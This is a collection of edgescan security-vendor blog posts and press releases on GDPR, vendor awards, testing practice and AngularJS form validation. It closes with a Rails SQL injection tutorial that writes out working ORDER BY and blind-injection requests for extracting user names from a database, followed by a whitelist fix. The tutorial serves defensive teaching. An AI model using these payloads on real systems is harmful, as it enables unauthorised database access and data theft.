asset. View this video to find out more. ### edgescan & GDPR: Improving compliance and reducing the cost of cybersecurity Some people still don’t know where to start with GDPR. Here are some simple key points to kick you off…. Identify the personal data you collect and where data is stored – Is it stored appropriately how are you protecting the data from a cyber standpoint? Are your applications secure, regularly tested, designed with security in mind? Can you prove this? Review your internal policies including a review of security breach response policy. – Incident response, DR and BCP. What happens if something goes badly wrong. Whats happens in the event of a breach? Do I have mitigation controls and notification procedures in place? Review the type of data processing carried out, identify the legal basis for the processing and document it. – do you need all that client data you possess and do you have a legal basis for storing client data. Review how you handle all applicable client’s rights, including the deletion of personal data, right to be forgotten (RTBF). Review if and how you seek, obtain and record client consent and whether any changes are needed. – Do clients know you are storing their data and what you are using it for? Have they consented to what you are doing? Can you prove this? Review your external privacy policies and EULA’s and do a refresh with necessary changes for transparency and relevancy. Review and update your processor/subprocessor, third party agreements. Third party risk for up/down stream processors of your clients data. – You can outsource the service but not the risk. Do you know if your B2B partners are secure, store your client data properly and don’t use it for any other reason other than what is agreed? Do they have a policy to reflect this and how is it policed? How often do they get technical security assessments of the systems used to process your clients data? How do they demonstrate this? Review the lawful basis for the transfer of personal data outside the EU. If you transfer data outside of the EU are you permitted to do so by the data owner (client)? Cyber-security, GDPR, Articles and Controls: The new General Data Protection Regulation (GDPR) is set to replace the Data Protection Directive 95/46/ec which is enforceable as of May 25, 2018. The GDPR is directly applicable in each member state and will lead to a greater degree of data protection harmonization across EU nations. The GDPR does suggest actions to take in order to be compliant such as a process for regularly testing, assessing and evaluating the effectiveness of technical and organizational measures for ensuring the security of the processing. From a cybersecurity standpoint this covers aspects such as technical assessment, patching and maintenance, vulnerability management, threat detection /prevention, asset and service profiling & visibility and overall better governance of an organisations digital estate and technical controls. EU GDPR – Article 32, Security of Processing Taking into account the state of the art, the costs of implementation and the nature, scope, context and purposes of processing as well as the risk of varying likelihood and severity for the rights and freedoms of natural persons, the controller and the processor shall implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk, including inter alia as appropriate: GDPR in effect is mandating that appropriate technical security controls are required amongst other equally important controls (citizen access and control of their data) to ensure a level of security based on the data and risk/impact of disclosure of such information. “to ensure a level of security appropriate to the risk” is an important aspect which should be considered. Given that a firm may be custodians of a users financial or Personal Identifiable Information (PII) there is a duty of care to protect the data and ensure proper authorisation and security controls surround it.  From a technical standpoint security assessments and vulnerability management are some of the tools used to help maintain that level of assurance…… edgescan provides continuous assessment of technical systems in order to help discover vulnerabilities which may lead to breach. The “win” in using edgescan is you have an auditable history of all assessments and individual vulnerability history to demonstrate the vulnerability lifecycle to easily demonstrate compliance and continuous improvement. The idea of a single or bi-annual assessment is becoming non-sustainable given the rate of change of systems in particularly cloud based deployments.  The ability to continually assess security posture on an ongoing basis and exploiting a combination of automation and human intelligence is taking traction globally resulting in cost reduction and increasing rigor depending on the vendor used. There is a trend in the industry to move towards Managed Security Services Providers (MSSP) and leveraging experts who deliver services such as vulnerability management on a fulltime basis. An MSSP should address requirements where you don’t have in-house expertise. EU GDPR – Recitals of Interest Recital (78) The protection of the rights and freedoms of natural persons with regard to the processing of personal data require that appropriate technical and organisational measures be taken to ensure that the requirements of this regulation are met. Appropriate technical measures are easily confirmed and identified using edgescan as a complete security history can be reviewed for any period of time on an on-going basis. In the case of a reasonable fast moving technical environment which undergoes change on a frequent basis e.g Cloud environment, Agile system development methodologies an annual or a bi-annual security assessment to help ensure the security of the systems in scope may seem like a reasonable approach but the risk is the rate of change of the environment and the resulting window of exposure due to the infrequency of technical security assessment. Continuous assessment as per the edgescan service helps you maintain constant vigilance in order to assist with GDPR compliance. In order to be able to demonstrate compliance with this Regulation, the controller should adopt internal policies and implement measures which meet in particular the principles of data protection by design and data protection by default….. Demonstrating compliance in relation to cyber security is easily delivered as the edgescan portal delivers a complete history of all vulnerabilities (web & infrastructure) discovered and closed over the entire licensing period.  Many of our clients in highly regulated industries use edgescan to demonstrate to external auditor’s constant assessment approach they have adopted to cyber security. Data Protection by default can be assessed in both pre-production environments and deployed production systems. Using edgescan to detect and mitigate vulnerabilities (via WAF integration) is core to being able to demonstrate compliance. Such measures could consist, inter alia, of minimising the processing of personal data, pseudonymising personal data as soon as possible, transparency with regard to the functions and processing of personal data, enabling the data subject to monitor the data processing, enabling the controller to create and improve security features. “You can’t improve what you can’t measure”; edgescan gives our clients the ability to continuously improve by tracking security posture at any point in time. The metrics supplied by edgescan let our clients easily focus on what is the most common vulnerability, the root cause and identify quick wins in a clear and easy fashion. When developing, designing, selecting and using applications, services and products that are based on the processing of personal data or process personal data to fulfil their task, producers of the products, services and applications should be encouraged to take into account the right to data protection when developing and designing such products, services and applications and, with due regard to the state of the art, to make sure that controllers and processors are able to fulfil their data protection obligations. The principles of data protection by design and by default should also be taken into consideration in the context of public tenders. In pre-production environments edgescan gives our clients the ability to assess the security of a solution quickly and on-demand. This assists with detection of cyber security issues before a system is deployed to production, resulting in a “secure by default” posture. Recital (49) The processing of personal data to the extent strictly necessary and proportionate for the purposes of ensuring network and information security, i.e. the ability of a network or an information system to resist, at a given level of confidence, accidental events or unlawful or malicious actions that compromise the availability, authenticity, integrity and confidentiality of stored or transmitted personal data, and the security of the related services offered by, or accessible via, those networks and systems, by public authorities, by computer emergency response teams (CERTs), computer security incident response teams (CSIRTs), by providers of electronic communications networks and services and by providers of security technologies and services, constitutes a legitimate interest of the data controller concerned. This could, for example, include preventing unauthorised access to electronic communications networks and malicious code distribution and stopping ‘denial of service’ attacks and damage to computer and electronic communication systems. Detecting weaknesses of the security posture in an ever-changing environment is core to what edgescan provides. Our fullstack approach to security gives our users visibility of both web application and supporting host/cloud security. As new deployments and features are delivered edgescan automatically assesses the security posture of the deployment and associated subsystems. This approach including validation of all discovered vulnerabilities by our experts in effect removes the need for expensive consulting firms and also improve security resilience on an ongoing basis.       Recital(81) To ensure compliance with the requirements of this Regulation in respect of the processing to be carried out by the processor on behalf of the controller, when entrusting a processor with processing activities, the controller should use only processors providing sufficient guarantees, in particular in terms of expert knowledge, reliability and resources, to implement technical and organisational measures which will meet the requirements of this Regulation, including for the security of processing. The adherence of the processor to an approved code of conduct or an approved certification mechanism may be used as an element to demonstrate compliance with the obligations of the controller. edgescan’s continuous and on demand fullstack approach provides sufficient guarantees that your systems are constantly being assessed for security weaknesses. Provision of historical assessment frequency, vulnerability data and proof of continuous improvement and vigilance is what is required to be GDPR compliant. You can easily demonstrate compliance with      Recital(83) In order to maintain security and to prevent processing in infringement of this Regulation, the controller or processor should evaluate the risks inherent in the processing and implement measures to mitigate those risks, such as encryption. Those measures should ensure an appropriate level of security, including confidentiality, taking into account the state of the art and the costs of implementation in relation to the risks and the nature of the personal data to be protected. In assessing data security risk, consideration should be given to the risks that are presented by personal data processing, such as accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to, personal data transmitted, stored or otherwise processed which may in particular lead to physical, material or non-material damage. edgescan detects weaknesses in cyber security posture so you can quickly address issues as they are found. Via our API, alerting or integration you can easily and quickly understand risks by priority easily evaluate potential impacts and prevent the destructive forces of being hacked and associated fines of being non-GDPR compliant. Want to know more: edgescan: edgescan.com Client reviews: Gartner Peer Insights ### edgescan – ixtel UAE partnership Date: 28 October 2015, Dublin, Ireland edgescan has announced a new partnership in the UAE. iXTEL. one of the leading suppliers in the UAE of network services for converged infrastructures and security solutions.   Why ixtel? “We believe iXTEL are the right level of partner for us in relation to providing support for edgescan in the UAE. iXTEL (www.ixtel.com) are a great edition to the edgescan family. This helps spread our reach across the UAE with offices in Dubai, Abu Dhabi and Oman” – says Eoin Keary, edgescan Director and CTO. “I’m happy we can bring edgescan to the region of the right footing….edgescan is proving the managed services model is very cost effective and provides superior coverage and depth in relation to cyber vulnerability management. Im happy we can provide edgescan on the UAE…” – says Rahim Jina, Operations Director for edgescan. For further information, please contact:Yannick Bordereau, edgescanEmail: yannick@edgescan.comP: +353 (1) 681 5330 ### edgescan announces the release of the edgescan-jira plugin We’re delighted to announce the release of the edgescan Jira Plugin. This is a free plugin for Jira which uses the new edgescan API to integrate edgescan data with Atlassian’s powerful issue tracking platform. Date: 30/9/2015, Dublin, Ireland With the plugin installed and configured, a Jira issue will be automatically created for each new vulnerability found on your assets. Once imported into Jira you can assign these issues to members of your development team, and use Jira’s features to track progress towards closing them. Then, when the vulnerability has been verified as fixed by one of our engineers, the plugin will automatically mark the corresponding Jira issue as closed. The plugin is available as a jar file, and a user manual detailing how to install and configure the plugin may be found here. The plugin should be added to the Atlassian Marketplace in the near future. For those interested we’ve also made the source code for the plugin available on github. Project link screen We hope you enjoy using the plugin and look forward to hearing your feedback. For further information, please contact us: Email: info@edgescan.com P: +353 (1) 681 5330  ### edgescan announces new Gartner status award edgescan: “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a service (Saas) and Cloud Security 2015 Date: 27/7/2015, Dublin, Ireland edgescan, the leading provider of web application and server risk management solutions announced today that it has been listed as a “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a service (Saas) and Cloud Security 2015. “This validates our approach to vulnerability management. After providing Gartner with numerous vendor briefings, our approach to combining both Layer-7 (Web Applications) and Hosting infrastructure vulnerability management as one service is proving positive.” – Rahim Jina, Director with BCC Risk Advisory, edgescan’s parent company. “Hackers don’t really care if a vulnerability is in the web application layer or the hosting layer of a systems technical stack. Attackers attack the weakest point regardless. edgescan provides superior coverage across all layers combining full-stack automation with manual validation of all discovered vulnerabilities.” – Eoin Keary (CTO) For further information, please contact us:Email sales@edgescan.comP: +353 (1) 681 5330 Protect Your Mobile Apps with MAST Being recognized by Gartner reaffirms our commitment to delivering top-tier solutions. That’s why our Mobile Application Security Testing (MAST) protecting our clients from vulnerabilities while ensuring compliance. From our offices in Dublin and New York, we help secure your mobile solutions with cutting-edge expertise. ### edgescan is a “Notable Vendor” in Gartner’s Magic Quadrant for Managed Security Services At edgescan we put great effort to ensure our Cyber Security SaaS (Security as a Service) solution meets the highest industry standards. edgescan has been recognized by the industry in the following ways: PCISSC (Payment Card Industry Security Standards Council) edgescan is the only ASV certified SaaS of its kind which provides both full stack vulnerability management and continuous assessment on demand. Gartner Cyber Security – Garter Peer Insights – Highest Score – 2017 One of the Highest Scoring Application Security Testing (AST) solutions on the Gartner moderated Peer Insights portal Read More Managed Service Company of the Year We’ve been nominated for MSC of the year due to our global expansion and penetration across many industry verticals such as Gaming, Media, Energy, Finance but to name a few. Winner – Rising Star of the Year edgescan triumphed in the Tech Excellence Awards 2016 “Rising Star” category by leading the charge with our SaaS and growing it by over 400% in the past year. Gartner Hype Cycle for Application Security, SaaS and Cloud Security 2015 – Application as a Service edgescan, the leading provider of web application and server risk management solutions announced today that it has been listed as a “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a service (Saas) and Cloud Security 2015. Try edgescan today, Gartner Cyber Security accredited and multi award winning… Try edgescan, our award winning security services and solution today, see the link below or contact the edgescan team direct at info@edgescan.com or see our internationally numbers on our Contact Us page. ### Security done wrong and blowing the budget…how not to secure your business The State of Cyber Security: We don’t want a 15 year old breaching our systems, stealing data and taking 13% off our share price as a result…..hmm I think not. If I wanna be hacked the hacker has got to be elite and like an uber hacker right!! It is strikingly obvious that security is still weak for both the large enterprise and smaller organisations alike. Take TalkTalk hacked by 15yr old for example… We live in a world where multi-million euro businesses can be drastically hit by ANYONE with the will, determination and curiosity, I sh*t you not!!. Poor practices we accept in the industry Yearly security testing on sites & systems that change frequently We perform annual testing of our systems, in a time limited manner. Our systems are in a constant state of flux (for the below reasons) but we still only do the annual security test. See anything wrong here? 3 words  for you…Window Of Exposure Changes in code Happen more frequently, we are more “Agile” than ever. We push code frequently and spread the risk of dev failure as opposed to hoping everything works at the end of the project. The more we change the less valuable our previous security report is. Within days of a security test the value of the report is degraded due to the system having changed since the report was written. With this in mind, as change occurs and no security verification is done our window of exposure grows. Changes in supporting environment. We patch systems where we can as per our patch management policy but this is never as easy as it sounds. Patching live systems can result in negative effects to the hosted systems. Patches can break stuff!!  So we don’t patch as often…On a day to day basis we are secure one day the next we have a vulnerability because it has just been discovered and made public knowledge. Annual testing does not scale to the dynamic nature of the systems we manage and own. Automate everything Highly automated is weak there are many aspects of web data flow which breaks automation and reduces coverage. Highly automated solutions can result in impacting/harming live systems such as submission of 1000’s of emails/tickets, impacting performance, exhaustion of system resources. Highly automated solutions can submit sensitive webforms and corrupt data or system state. Many vulnerability scanners can submit invasive attacks which appear idempotent but in the context of the system they are very destructive. Un-tuned automation can result in DoS (Denial of Service) issues. Many scanners use excessive aggressiveness when scanning. Risk is not linear Automation does not understand risk. Risk is a human concept and needs to be assessed by humans Not all vulnerabilities are equal and depends on logical context and where a given type of vulnerability is situated. Secure the WebApp Developer Code Only Is a web application only Developer Code? It appears from various studies that circa 90% of an average web application is framework/component code and not written by the developer at all. – focusing on developer written code alone is not application security!! Component Security As an industry we don’t talk much about the 90% of code running our web applications which we did not develop…funny that. – without component security you are not doing application security Like do we maintain components/frameworks as we patch OS’s??  – No hope. Do we have a component security policy the same way we have a patch management policy?  – Nope OS Security 65% of vulnerabilities are due to poor patching, misconfiguration or deprecated services. Yep 65% of vulnerabilities – edgescan vulnerability stats report 2015. “Hackers don’t give a Sh1t” so if you have focused on web app security only they shall come in via the OS! Make sense? We use SSL – (yes I’ve said it) – People still say this – No idea why given SSL V2 and V3 is broken!! We use a WAF – (again more bullsh*t). Logical vulnerabilities, Behavioural weaknesses that’s where the money is anyways!! Your WAF don’t mean diddly on its own as it only detects technical attacks, not logical weaknesses. ### Risk – Medieval approaches to AppSec Vulnerability management involves a little more than finding security issues in code and/or hosting systems……I find that much of the industry does not understand that vulnerability management, penetration testing, threat detection, endpoint detection, malware prevention and even anti-virus services and tools are about managing risk. Managing risk is about reducing it to a suitable level based on the cost of reducing it in the first place. There is no point in spending lots of time and effort on an issues which have little impact or which are very unlikely. Firstly what we want to to reduce the impact of the stuff which has a decent chance of occurring and would be a real pain in the ass if it happened, it would disrupt our business etc. “A situation involving exposure to danger…” So blindly throwing tools at a problem to help discover risks to your business is not going to work….but why?? Tools don’t understand Risk: automated tools cannot give you an idea of risk. They find technical bugs wherein they manifest themselves into security vulnerabilities if they introduce the potential of risk. A tool does not understand what a risk is in the context of “a situation involving exposure to danger...” Tools find bugs. – Blessed are the tool makers whom hand craft the tools of the interweb to detect systems unworthy of the title “secure”. – Nobody expects the Spanish inquisition!! People will not understand Risk without understanding what is at Risk: So to understand a potential risk faced by a system the individual making the risk based decision needs to understand the system. The fact remains most security folks don’t have time to understand what the system is/does and therefore cant apply a reflective relative risk assessment. – “The oldest and strongest emotion of mankind is fear, and the oldest and strongest kind of fear is fear of the unknown” Tools may discover risk in a risky way!!: Many security assessment tools are not designed, out-of-the-box to be production safe. Production safe testing requires rule tuning such that detection of technical vulnerabilities does not invoke invasive or disruptive tests. We don't want our assessment methodology to damage our sick patient. – “Our chief weapon is surprise, fear and surprise; two chief weapons, fear, surprise, and ruthless efficiency! Er, among our chief weapons are: fear, surprise, ruthless efficiency, and near fanatical devotion..” Risk Based approach – Really?? Wow!: All risk management is based on er, um Risk. If you hear someone talking about “A risk based approach when discussing Application security” ask them “what is the risk of of a kick in the ass?” Or “What other approaches are there?” – “A ship is always safe at the shore – but that is NOT what it is built for.” Vulnerability is the state of being open to injury… All vulnerabilities are not created equal: Bottom line is how open are you to the possibility of said injury? How bad can the injury be? We don’t need to fix all the bugs just the ones that matter (and that which may injure the business or your clients). To understand “what matters” you need to understand the context of the issue. Tools alone can’t do this, that’s why we developed edgescan.com….. ### edgescan 2016 Stats Report ### Skillful, Scaleful Fullstack Security in a state of constant flux. Eoin Keary’s talk at Appsec Cali 2016 – Video & Slides Please feel free to share this material with others as a work aid for building more secure code and applications. Download Slides here – Skillful Scalefull Fullstack Security in a state of Constant Flux ### Ruby secure coding workshop Owen Mooney, edgescan’s lead developer, delivered a talk about common risks faced when coding in ruby and ruby on rails. The talk covered some best practices and pitfalls when writing a secure web application in ruby on rails. With examples on how to deal with the OWASP top 10, as well as some ruby specific vulnerabilities. Click here to access the Git Repository with the working code. Please follow these steps in orther to get the app to work: To install, you must have ruby, gem, and bundler installed. Run the following command to install dependencies: To get the SQL injection stuff working, you will have to perform a few additional steps. If you want to use MySQL, then you will have to edit the config/database.yml file. Specify the adapter as mysql2 and then set the username, password, database, and host properties as appropriate. In any case, you must run the following tasks to create/migrate the database: To create some data to populate the database, run rails console, and use the following command You can change the attributes appropriately and run the command multiple times. To run the application, simply run The bundle exec can be omitted if you are using some sort of ruby environment manager like RVM. Have fun! ### edgescan 2016 Stats Report Infographic ### Rahim Jina’s talk at Appsec Cali 2016 – Video & Slides “Hard to Port!, A Snapshot of the Vulnerability Landscape in 2015”, Rahim Jina’s talk at Appsec Cali 2016. Please feel free to share this material with others as a work aid for building more secure code and applications. Hard to Port – Download Slides Here ### Eoin Keary at Infosecurity Europe 2015 Eoin Keary, edgescan director, founder and CTO at Infosecurity Europe 2015 Conference.   ### edgescan announces a new partnership in the UAE! Date: 28 October 2015, Dublin, Ireland edgescan has announced a new partnership in the UAE. iXTEL. one of the leading suppliers in the UAE of network services for converged infrastructures and security solutions.   Why ixtel? “We believe iXTEL are the right level of partner for us in relation to providing support for edgescan in the UAE. iXTEL (www.ixtel.com) are a great edition to the edgescan family. This helps spread our reach across the UAE with offices in Dubai, Abu Dhabi and Oman” – says Eoin Keary, edgescan Director and CTO. “I’m happy we can bring edgescan to the region of the right footing….edgescan is proving the managed services model is very cost effective and provides superior coverage and depth in relation to cyber vulnerability management. Im happy we can provide edgescan on the UAE…” – says Rahim Jina, Operations Director for edgescan. For further information, please contact:Yannick Bordereau, edgescanEmail: yannick@edgescan.comP: +353 (1) 681 5330 ### AngularJS and forms security & design Overview Rich internet applications make use of the powerful features that new web browsers come equipped with. The web has come a long way since the dull, stateless server content generated HTML pages of the 90’s. Today it is possible to interact with almost any webpage, thus opening a miryad of possibilities to the user and to malicious users alike. Javascript has come to play a major role in web development, from the old days when it was merely used to manipulate the DOM (Document object model) via HTML and XML to todays powerful JS frameworks taking advantage of the much lighter JSON (JavaScript Object Notation) to send and receive data to and from servers. Here at edgescan™ our JS framework of choice is AngularJS. Angular is pretty cool in the sense that it allows developers to create dynamic web applications by creating reusable components such as services, directives and factories; these components can be injected into the different parts of a web application, thus helping developers to adhere to the all important DRY (Don’t Repeat Yourself) principle. AngularJS adheres to the MVC design pattern (Model, View, Controller) where the model relates to the data that comes from and is sent to an API. The view comprises the HTML and related directives for DOM manipulation. The controller handles all the business logic and is the nexus between models and views. Forms Forms always are a contentious topic in web development. Not only from a design point of view but from a security one too. One of the most important considerations when designing and coding forms is that any effort to enforce client side security upon forms can be easily bypassed either by disabling JS in the browser or by manipulating requests and responses. Also any attempt to blacklist words or symbols from being input into a form is futile. From this standpoint it is very clear that the responsibility for securing user input should rest at server side level. Unfortunately users can not be trusted and all user inputs must be validated and sanitized at server side. Angular comes alive in the browser and as such it can be turned off, meaning a malicious user can still gain access to our db or server if server side measures are not put in place. Having discussed security in the context of server side and client side, we can then focus in making our forms as user friendly as possible, by ensuring our forms are functional, short (as short as the demand for data allows!) and keep users in the loop as to what is happening both during the fill in process and upon submission. Validation in action! It is very clear there are two fields in the above form that need to be validated to ensure consistency in the information users can input: the email and phone number fields. For this, Angular provides us with native form validation directives to help us along the way. The available helpers are: Therefore, if we wish to ensure a user will only enter numbers in the phone number field or a valid email address in the corresponding field we could do the following: Wow! That looks like a lot of code! However it is necessary if we want to: ensure some sort of consistency to the inputs we accept in our applicaton. help keep the user informed as to what is happening. The second point is a very interesting one as any type of front end validation must always be accompanied by an error message so as to let the user know what is happening both during form completion and upon submission, as suggested by Jacob Nielsen’s 10 heuristics for user interface design: “Visibility of system status: The system should always keep users informed about what is going on, through appropriate feedback within reasonable time.” Let’s take a closer look at the code, the email field looks like this: The magic happens at the ng-pattern, as we make use of Angular’s native service to include a regular expression (regex) to try and identify the input as a valid email address. Regex can be very complex, the above regex will provide us with the minumum necessary filter to ensure the email address entered is of the correct format, that is including a ‘.’ (dot) and a @ symbol, Whether the email address is real or not, well we can’t really check that and we have to leave it to our user’s good conscience!. There are two more important bits related to usability: ng-class="{ 'has-error' : userCreate.email.$invalid && ! userCreate.email.$pristine }" the ng-class helper allows us to create a condition to check a) if the email address is valid according to the regex userCreate.email.$invalid b) if any value has been input into the field userCreate.email.$pristine Where   Will be triggered due to the ng-show helper that gets executed if the email address is invalid, prompting a message to the user “Enter a valid email.” Conclusion In the same way we have incorporated client side validation to the email field, we can take the same approach with any type of input field, always remembering that client side validation should be related to usability principles rather than security. Any security concerns should be handled at server side level. edgescan™ can help you detect security loopholes in your code base and help you remediate and mitigate the risks of such security concerns. Author: Javier Rossetti, software developer @ edgescan™ – July 2015 ### edgescan is a “Sample Vendor” in the Gartner Hype Cycle for Application Security, 2015 Edgescan: “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a service (Saas) and Cloud Security 2015 Date: 27/7/2015, Dublin, Ireland edgescan, the leading provider of web application and server risk management solutions announced today that it has been listed as a “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a service (Saas) and Cloud Security 2015. “This validates our approach to vulnerability management. After providing Gartner with numerous vendor briefings, our approach to combining both Layer-7 (Web Applications) and Hosting infrastructure vulnerability management as one service is proving positive.” – Rahim Jina, Director with BCC Risk Advisory, Edgescan’s parent company. “Hackers don’t really care if a vulnerability is in the web application layer or the hosting layer of a systems technical stack. Attackers attack the weakest point regardless. edgescan provides superior coverage across all layers combining full-stack automation with manual validation of all discovered vulnerabilities.” – Eoin Keary (CTO) For further information, please contact us: Email: info@edgescan.com +353 (1) 681 5330 ### “Vulnerability Management and Threat Detection by the Numbers” – Eoin Keary Key Note Speaker at Daggercon 2015 Our CTO, Eoin Keary delivered a Key Note Speech at Daggercon 2015 on “Vulnerability Management and Threat Detection by the numbers”. Please feel free to share this material with others as a work aid for building more secure code and applications. Vulnerability Management and Threat Detection by the numbers – Download Slides Here Daggercon 2015 ### Rails SQL injection gotchas In this post we're gonna look at some places where it is possible to inject arbitrary SQL commands into active record queries in Ruby on Rails. ActiveRecord has pretty good protection against SQL injection, so much so that sometimes I think it lulls us into a false sense of security.We're pretty well protected by default for 'where' queries. Consider the following code:@posts = Post.where(:title => params[:title]) This code will take the value of the URL parameter 'title' and insert it into a query. So if we make a request like:GET /posts?title=whatever We'll get the following SQL:SELECT `posts`.* FROM `posts` WHERE `posts`.`title` = 'whatever' So we know that we can insert text into the SQL query, let's try a standard SQL injection attack vector:GET /posts?title=whatever'%20OR1=1 SQL:SELECT `posts`.* FROM `posts` WHERE `posts`.`title` = 'whatever' OR 1=1' Rails automatically escapes the single quotes, preventing us from breaking out of context here. What about integral columns? Let's say we have the following code:@posts = Post.where(:score => params[:score]) So we make a request like soGET /posts?score=5 and we get the following SQL:SELECT `posts`.* FROM `posts` WHERE `posts`.`score` = 5 Now there's no longer any single quotation marks around our URL parameter when it gets incorporated into our query. This should make things easier right?GET /posts?score=5%20OR1=1 SQL:SELECT `posts`.* FROM `posts` WHERE `posts`.`score` = 5 Nope. Only the numeric part of the parameter is included in the query. Anything following the numeric part is discarded.So incorporating URL parameters into 'where' arguments is safe, as long as we use the hash form. (I'm assuming that most developers know better than to use string interpolation using untrusted data!). But other ActiveRecord query methods are not so safe.Consider the following code@posts = Post.order(params[:order_column]) This seems pretty innocuous. It provides us with an easy way of specifying the ordering of Post records, without having to write any complex logic. So we might make a request like so:GET /posts?order_column=title and get the following query:SELECT `posts`.* FROM `posts` ORDER BY title Hmmm, this looks interesting. There are no quotes around 'title'. What about:GET /posts?order_column=%27%3B-- This is just;'-- URL encoded.SQL:SELECT `posts`.* FROM `posts` ORDER BY ;'-- This causes a database error, but it shows that the query incorporates the order_column URL parameter verbatim. So what can we do with this? SQL does not allow conditions to be set after the ORDER BY clause so that limits our avenues of attack. Let's try adding our own data to the posts table. We can use a semicolon (%27) to delimit successive queries, so after the SELECT we can add an INSERT:GET /posts?order_column=title%27%20INSERT%20INTO%posts(content)%20VALUES%20('%3Cscript%3Ealert(1234)%3C%2Fscript%3E') This generates the following SQL:SELECT `posts`.* FROM `posts` ORDER BY title; INSERT INTO posts(content) VALUES ('') This looks right, but (un)fortunately, we get a DB error. ActiveRecord queries are constrained to only allow one SELECT. Adding a further query or update will cause an error. This means that it's not possible (as far as I am aware) of inserting arbitrary data into the database using this method. However we can get data out of the database using Blind SQL Injection.Blind SQL injection refers to SQL injection techniques when the result of the injected query is not directly measurable. In this case, we can't force the application to show us Post records that it would not otherwise display. What we need is a way of altering the query, so that under some conditions the returned Post records are different.One solution I've played around with is using the ORDER BY FIELD syntax in MySQL. This requires that we know the numeric id of the first post returned. This is usually pretty easy to find out when the application follow REST principles.Let's say the Post index method gives us the following records:GET /posts.json I'm using JSON to display the results here, but the technique should also apply to the HTML format, assuming you can get the numeric ids from the markup or otherwise. We can see that the results are ordered by the id column. Let's try the ORDER BY FIELD technique:GET /posts.json?order_column=FIELD(id, 1) This seems counter intuitive at first, we've ordered by the id column in the list , and it's put the Post with id 2 first. This is because FIELD is a function that returns the position of the value given in the first argument, in the list given as the remaining arguments. It is indexed from 1, and for any value that does not appear in the list, it returns 0. This means the record with id 2 will come first, since the value of FIELD in that case is 0.If we try the following request:GET /posts.json?order_column=FIELD(id, 0) We will get the original ordering back.Now we need to add a conditional to the request. In MySQL (probably others also) we can use IF as followsGET /posts.json?order_column=FIELD(id, IF(true, 0, 1)) GET /posts.json?order_column=FIELD(id, IF(false, 0, 1)) These two requests should return different orderings of posts.To actually retrieve some data, we need to use subqueries. We're gonna cheat a little bit here and assume we know that there is a users table with a name column. We're gonna try and get the name of the first user in the database. We can only ask true or false questions, so this takes a little bit of time. The procedure we'll use is to check whether the column value is lexicographically less than some value (i.e. would come before it in alphabetical ordering), and use bisection to reduce the number of checks.GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'm', 0, 1)) #T GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'g', 0, 1)) #T GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'd', 0, 1)) #T GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'b', 0, 1)) #T GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'a', 0, 1)) #F # first character is 'a' GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'am', 0, 1)) #T GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'ag', 0, 1)) #T GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'ad', 0, 1)) #T GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'ae', 0, 1)) #F # second character is 'd' .... a few more requests GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) = 'admin', 0, 1)) #T You can see in the last request, I changed the less than sign to basic equality as a sort of sanity check. So the first name in the users table is admin, to get further users, we can use OFFSET and get the rest of them.In conclusion, the SQL injection protection in Rails is not a magic bullet, you still need to think about how attacker controlled data might be incorporated into SQL queries. The solution for the above issue would be to whitelist the possible orderings. This can be achieved using something like the following codeorder_column = 'title' if Post.column_names.include?(params[:order_column]) order_column = params[:order_column] end @posts = Post.order(order_column) Check out how common SQL Injection is in the real world, and get insight into other vulnerabilities detected by edgescan on a daily basis here: 2014 edgescan vulnerability report. Stopping SQL Injections with DASTSQL injections are a persistent threat, and we’re here to help. At Edgescan, our Dynamic Application Security Testing (DAST) Service actively identifies and mitigates SQL injection vulnerabilities to protect your applications. With teams in Dublin and New York, we ensure your systems are safe from exploitation.